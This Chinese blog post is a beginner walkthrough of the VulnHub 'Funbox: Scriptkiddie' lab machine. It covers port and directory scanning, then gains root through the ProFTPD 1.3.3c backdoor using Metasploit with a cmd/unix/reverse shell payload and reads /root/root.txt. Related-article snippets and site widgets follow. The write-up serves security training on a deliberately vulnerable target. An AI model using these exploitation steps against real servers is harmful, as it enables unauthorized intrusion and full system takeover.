Vulnhub靶场之Funbox

已于 2024-03-08 14:41:11 修改
阅读量756 收藏 1
点赞数
文章标签: linux 运维 服务器
于 2023-11-08 10:02:47 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_69775412/article/details/134282229
版权

正如该靶场的描述所说,它对初学者来说非常简单。
项目地址:Funbox: Scriptkiddie ~ VulnHub
所需工具: KaliLinux即可。

0x00 信息收集

打开虚拟机后使用nmap扫描一下网段存活,这里我给的虚拟机的范围是100-253,其中kali的IP是100,所以NAT模式下,靶机肯定在我扫描的这个范围。

由图可见,靶机的IP是192.168.2.126,接下来我们来扫描一下该主机的默认端口及服务版本。

nmap -sV 192.168.2.126  # 获取常用端口及其端口所对应的服务版本信息

0x02 目录扫描

有80端口的话,先扫一下目录~

dirsearch -u http://192.168.2.126

可以发现扫到了很多wp开头的路径,很显然这个网站是一个Wordpress框架,那么我们可以看看有没有相关文件可以看到Wordpress的版本信息

通过查看源代码,我们可以看到wordpress的版本号为6.3.2。

使用kali在漏洞库中搜索版本号相关信息,没有发现相关漏洞信息。后面通过wpscan扫描了一下也没有发现什么可以利用的东西,都是一些指纹信息。说明这道题的考点可能不在80端口。我们转换一下攻击方向看看其他端口有什么情况。

0x03 ftp ProFTPD 1.3.3c

接下来,我们将目标转向21号端口,首先尝试一下匿名登录。

可以看到拒绝访问,应该是没有开匿名登录的功能,接下来在漏洞库搜下版本号。

searchpol

**我们可以看到有两条利用信息,其中第一条是远程代码执行,后面给了个绝对路径,是一个txt文件,里面是漏洞利用的源码;第二条是命令执行,可以直接通过Metasploit来利用,我们可以直接通过msf来利用,这里我们使用第二条

0x04 Metasploit

打开Metasploit并搜索相关漏洞信息。

msfconsole
msf6 > search ProFTPD 1.3.3c

可以看到,准确搜索,刚好就是我们想要利用的模块。直接进入该模块配置相关信息。

msf6 exploit(unix/ftp/proftpd_133c_backdoor) > set rhosts 192.168.2.126
rhosts => 192.168.2.126
msf6 exploit(unix/ftp/proftpd_133c_backdoor) > set payload cmd/unix/reverse
payload => cmd/unix/reverse
msf6 exploit(unix/ftp/proftpd_133c_backdoor) > set lhost eth0
lhost => eth0
msf6 exploit(unix/ftp/proftpd_133c_backdoor) > run

可以看到,等个大概一分钟,成功获取了靶机的控制权。

0x05 获取FLAG

ls /root
cat /root/root.txt

0x06 总结

  1. 信息收集 -> 获取目标IP
  2. 端口扫描 -> 获取目标IP的端口开放情况及服务版本信息
  3. Web端口 -> 目录扫描获取敏感信息,如果是CMS就通过版本信息搜索历史漏洞,如果不是就手工测试
  4. 其他服务端口 -> 通过服务版本在漏洞库搜索相关漏洞信息
  5. 通过FTP漏洞获取ROOT权限。
  6. 之所以说这道题简单,是因为msf攻击成功后直接是root权,不需要其他的提权操作,所以说对新手来说的话还是比较简单的。
阿一网络安全
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
vulnhub--Funbox: Scriptkiddie
venu_s的博客
08-16 653
靶机介绍 Difficult: As always, it’s a very easy box for beginners. Goal: Get flag Download:https://www.vulnhub.com/entry/funbox-scriptkiddie,725/ 信息探测 主机发现 netdiscover -i eth0 -r 192.168.0.128/24 端口扫描 nmap -sV -p- -A 192.168.0.131 nmap扫描结果 并不能用 anonymous
中兴funbox固件b18版本
07-12
【中兴funbox固件b18版本】是一款专为中兴Funbox设备设计的系统升级包,基于Android 4.4操作系统。该固件旨在优化设备性能、增强稳定性、修复已知问题以及可能添加的新功能。对于用户来说,升级到这个版本可以提升...
ifunbox中文版
12-07
iFunBox是iPhone以及苹果其他产品的通用文件管理软件,iFunBox使苹果的各类便携式设备得以共享文件和程序,iFunBox为您...
2024年最全看完这篇 教你玩转渗透测试靶机vulnhub——FunBox1(1),2024年最新科学技术协会面试
2401_84562858的博客
05-08 774
1.修改/etc/hosts文件 解析网站2.从新学习了一遍定时提权 (主要是回弹的命令)3.还有一些简单的扫码工具 和枚举工具 这靶机其实很简单 因为太久没做了 所以从新温习一下 主要是学习渗透的思路!网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。需要这份系统化的资料的朋友,可以戳这里获取一个人可以走的很快,但一群人才能走的更远!
Funbox10靶场--详细教程
qq_41245301的博客
01-25 1291
更新下载资源包下载gobustercompletion: 为指定shell生成自动完成脚本dir:文件路径/目录枚举dns:dns子域名枚举s3:枚举打开储存桶并查找存在和存储桶清单(适用aws)命令说明completion为指定shell生成自动完成脚本dir文件路径/目录枚举dnsdns子域名枚举fuzz使用模糊测试模式。替换URL、Headers和请求体中的关键词FUZZgcs使用gcs bucket枚举模式help获取任何命令的帮助信息s3。
看完这篇 教你玩转渗透测试靶机vulnhub——FunBox1
Aluxian_的博客
09-05 2292
vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。老样子需要找到flag即可。1.修改/etc/hosts文件 解析网站2.从新学习了一遍定时提权 (主要是回弹的命令)3.还有一些简单的扫码工具 和枚举工具 这靶机其实很简单 因为太久没做了 所以从新温习一下 主要是学习渗透的思路!
靶机渗透练习27-Funbox6-Gamble Hall
hirak0的博客
04-18 892
靶机描述 靶机地址:https://www.vulnhub.com/entry/funbox-gamble-hall,551/ Description Not a reallife box ! It’s a very easy box, that makes you crazy. Hints: Don’t forget to add: funbox6.box in your /etc/hosts ! This works better with VirtualBox rather than VMware
vulnhub靶场FunBox-8
qq_58091216的博客
05-26 926
我们查看根目录有/home,我们进行查看,可以看到4个用户名,我们再次进行ftp爆破。因为4个用户名,只有john没有爆破出来密码,所以我们进行ssh爆破。我们可以看到是一幅画,查看源代码发现,需要域名绑定。爆破出来用户名是johh,密码是zhnmju!我们首先把用户名放到一个文件里面,然后进行爆破。我们换一个思路进行渗透,我们想到前面的源代码。我们发现了密码,我们进行下载,我们进行爆破。我们想到开启了21端口,我们进行查看。我们可以看到2个文件,我们进行查看。我们查看jules用户名。
funbox:测试和工具程序
02-11
"funbox"是一个用于测试和工具程序的项目,主要基于C语言开发。在软件开发过程中,测试和工具程序起着至关重要的作用,它们能够帮助开发者有效地检查代码质量、定位问题以及提升开发效率。下面我们将详细探讨这个...
FunBox.zip_melody
09-24
FunBox.zip_melody】是一个与音乐相关的ASM(汇编语言)代码压缩包,用于实现门铃的旋律播放功能。ASM代码是低级编程语言,直接对应于计算机硬件指令,因此这种项目通常需要深入理解处理器架构和音乐理论。在这个...
funbox_reactapp:测试
05-11
该项目是通过引导的。 您将在下面找到一些有关如何执行常见任务的信息。 您可以在找到本指南的最新版本。目录自动格式化代码更改页面<title>... 使用AJAX请求获取数据与API后端集成节点Ruby on Rails 在开发中...
funbox界面需求文档-20160414.docm
05-08
funbox界面需求文档-20160414.docm
VulnHubFUNBOX: SCRIPTKIDDIE渗透
m0_73481504的博客
02-25 1053
1.需要收集信息,根据扫描出的结果做分析。2.了解使用msf渗透需要的步骤3.了解FTP的ProFTPD 1.3.3c漏洞利用。
FunBox11靶场 安装下载渗透详细教程
qq_41245301的博客
12-22 1169
3.通过扫描发现开启了ftp服务并且ftp的版本很低我们可用尝试通过这个服务进攻击。靶机通常在root目录下有个root.txt的文件看到它表示这个靶机已经拿下。我们发现这个版本的ftp是有漏洞的而且在msf中有对应的漏洞利用模块。-A : 启动Os检测,版本检测,脚本扫描和traceroute。通常情况我们是通过服务的名称加版本配合search进行搜索。1.提供arp-scan工具扫描网络主机IP。2.通过nmap 对目标主机进行扫描。选择一个合适的payload进行设置。查看可用的payload列表。
【持续集成_05课_Linux部署SonarQube及结合开发项目部署】
weixin_42333261的博客
07-12 165
前置条件:sonarQube不能使用root账号进行启动,所以需要创建普通用户及。3)CMD上传qube文件-不能传到home路径下哦。2)添加用户、组名、密码。4)检查并解压上传的包。
linux的学习(四):磁盘,进程,定时,软件包的相关命令
最新发布
weixin_45037073的博客
07-14 813
关于磁盘管理,进程管理,定时任务,软件包管理的命令的使用。
Linux 安装 Docker Compose
m0_63004677的博客
07-12 312
Linux 系统安装 Docker Compose
Linux】 GCC/G++与Makefile使用
Long_kin的博客
07-11 991
收藏向 使用解析
FUNBOX: UNDER CONSTRUCTION!
08-16
- *1* *3* [vulnhub刷题记录(FUNBOX: UNDER CONSTRUCTION!)](https://blog.csdn.net/admin_gt/article/details/126722192)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值